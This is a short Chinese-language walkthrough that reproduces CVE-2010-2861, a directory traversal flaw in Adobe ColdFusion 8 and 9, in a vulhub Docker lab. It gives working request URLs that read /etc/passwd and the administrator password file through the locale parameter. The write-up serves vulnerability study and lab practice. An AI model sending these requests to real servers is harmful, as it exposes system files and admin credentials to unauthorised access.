CVE-2010-2861(AdobeColdFusion⽂件读取漏洞)
漏洞介绍
Adobe ColdFusion是美国Adobe公司的⼀款动态Web服务器产品,其运⾏的CFML(ColdFusion Markup Language)是针对Web应⽤的⼀种程序设计语⾔。
Adobe ColdFusion 8、9版本中存在⼀处⽬录穿越漏洞,可导致未授权的⽤户读取服务器任意⽂件。
环境搭建
cd vulhub-master/coldfusion/CVE-2010-2861/
sudo docker-compose up -d
sudo docker ps
环境启动可能需要1~5分钟,启动后,访问
cve漏洞库your-ip:8500/CFIDE/administrator/enter.cfm
可以看到初始化页⾯
输⼊密码admin,开始初始化整个环境。
漏洞复现
直接访问
your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en
即可读取⽂件/etc/passwd
读取后台管理员密码
your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。